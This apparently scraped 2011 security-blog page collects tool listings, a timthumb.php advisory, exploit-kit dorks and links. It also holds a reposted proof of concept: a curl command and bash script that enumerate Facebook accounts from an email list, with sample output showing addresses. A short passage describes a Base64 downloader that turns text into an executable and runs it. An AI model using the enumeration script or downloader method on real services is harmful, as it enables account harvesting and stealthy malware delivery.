Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. Useful programs for use in exploring malicious pages:

* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/

nSpaces: Multiple virtual Desktops With Password Protection and easy switch
Fetures of nSpaces

Launch Desktops: Create multiple desktops on your computer.
Launch Apps: Open different applications on each separate virtual desktops to improve your productivity.
Name your space: label your tag for each virtual desktop, the tag is shown on the space switcher.
Change wallpaper: Your desktop is unique, Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.
Color your space: If you don’t like to set a custom image for each desktop, just set a background color for them.
Protect your space: If you don’t like anonymous users to use your spaces, just set a password for them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you created, hotkey for the space switcher.You can change whatever you want.
Using Nspace is very easy and simple GUI based menu driven. Fast to configure and make changes and save.

Download
http://www.bytesignals.com/binary/nspaces/setup.exe

Fetures of websitedefender

Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security

Click here to register or know more on WebsiteDefender.
https://dashboard.websitedefender.com/register-for-free-website-scan.php

These are the current features of Hexinject:

Hexadecimal and raw data injection on the net
Sniff data in hexadecimal or raw format from the net
Data can be piped and easily manipulated
Raw network access cmdline framework
Automatically set the correct checksum (IP, TCP, UDP, ICMP)
Automatically set the correct packet length (IP, TCP, UDP, ICMP)

Download
http://sourceforge.net/projects/hexinject/files/

The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.

Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/

A Trojan spying on your conversations

Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx

C++ decompilation how to handle it in IDA and Hex-Rays decompiler. You can get the slides here
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
and download the recorded talk here.
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation

New injection url is 1see[dot]ir/j/. Currently leading to a Best Pack exploit kit

Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/

Step by step:

- - Go to http://m.facebook.com

- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.

Using cURL:

curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done

#+----- EOF ------+


You can ennumerate users by using a list of email address or phone numbers.

$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO

by
Zerial

Source
http://pastebin.com/GYNVsR1W

by
The Snake

A Comparison of 60 Commercial & Open Source Black Box Web Application Vulnerability Scanners.

By Shay Chen
Security Consultant, Researcher & Instructor
http://sectooladdict.blogspot.com/
sectooladdict-$at$-gmail-$dot$-com
August 2011
Assessment Environments: WAVSEP 1.0 / WAVSEP 1.0.3 (http://code.google.com/p/wavsep/)

As per Google search results, looks like 160,000 site have been compromised recently (Spyeye & Black hole Exploit kit)

Dork:
exero.eu/catalog/jquery.js

Web security testing tool and passive vulnerability scanner

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Download
http://websecuritytool.codeplex.com/releases/view/22212

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

Download
http://code.google.com/p/hexorbase/downloads/list

"It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's fexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions."

Download

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-mini.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-windows-full.exe

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-mini.run

http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run

http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2

Metasploit 4.0 And Armitage - What's New?

Source
http://pastebin.com/MFc4SY3S

download complete everything @
http://www.megaupload.com/?d=QKMY6HRW
UPDATE: GITHUB REPO AVAILABLE NOW! https://github.com/opendeveloper/anonware (^)_(^)

LAS VEGAS — The 2011 Black Hat security conference is promising a smorgasbord of (in)security fun. From vulnerabilities in PLCs (programmable logic controllers) to the security design of Apple’s iOS and potential hacker attacks on medical implant devices, the range of presentations this year could be the best ever.

Here’s a list of this year’s can’t-miss presentations:
http://www.zdnet.com/blog/security/black-hat-10-cant-miss-hacks-and-presentations/9132

Convert the EXE file to Base64 and upload it to a website. the downloader download it and save it as a text file. The downloader will then convert the Base64 text to binary, save it as an executable, and then execute it.



Download base64:
http://download.cnet.com/Base64-De-Encoder/3000-2247_4-10571789.html

Downoad PDF
http://www.vulnerability-lab.com/resources/documents/198.pdf

e.g.
http://tinyurl.com/3thjtw4

To show our appreciation for our security researchers, we offer a monetary bounty for certain qualifying security bugs. Here's how it works.
A typical bounty is $500 USD
We may increase the reward for specific bugs
Only 1 bounty per security bug will be awarded

Source:
http://www.facebook.com/whitehat/bounty/

Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies.

Download
http://code.google.com/p/websecurify/downloads/list

Here is the core information about the book,

Title: IDA PRO Book – 2nd Edition
Author:Chris Eagle
Publisher: No Starch Press
Pages: 672
Release Date: July 14, 2011

Here is the table of contents

PART I: Introduction to IDA
Chapter 1: Introduction to Disassembly
Chapter 2: Reversing and Disassembly Tools
Chapter 3: IDA Pro Background

PART II: Basic IDA Usage
Chapter 4: Getting Started with IDA
Chapter 5: IDA Data Displays
Chapter 6: Disassembly Navigation
Chapter 7: Disassembly Manipulation
Chapter 8: Datatypes and Data Structures
Chapter 9: Cross-References and Graphing
Chapter 10: The Many Faces of IDA

PART III: Advanced IDA Usage
Chapter 11: Customizing IDA
Chapter 12: Library Recognition Using FLIRT Signatures
Chapter 13: Extending IDA’s Knowledge
Chapter 14: Patching Binaries and Other IDA Limitations

PART IV: Extending IDA’s Capabilities
Chapter 15: IDA Scripting
Chapter 16: The IDA Software Development Kit
Chapter 17: The IDA Plug-in Architecture
Chapter 18: Binary Files and IDA Loader Modules
Chapter 19: IDA Processor Modules

PART V: Real-World Applications
Chapter 20: Compiler Personalities
Chapter 21: Obfuscated Code Analysis
Chapter 22: Vulnerability Analysis
Chapter 23: Real-World IDA Plug-ins

PART VI: The IDA Debugger
Chapter 24: The IDA Debugger
Chapter 25: Disassembler/Debugger Integration
Chapter 26: Additional Debugger Features

Appendix A: Using IDA Freeware 5.0
Appendix B: IDC/SDK Cross-Reference

Book:
http://www.nostarch.com/idapro2.htm

Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets.

Download
http://www.squertproject.org/download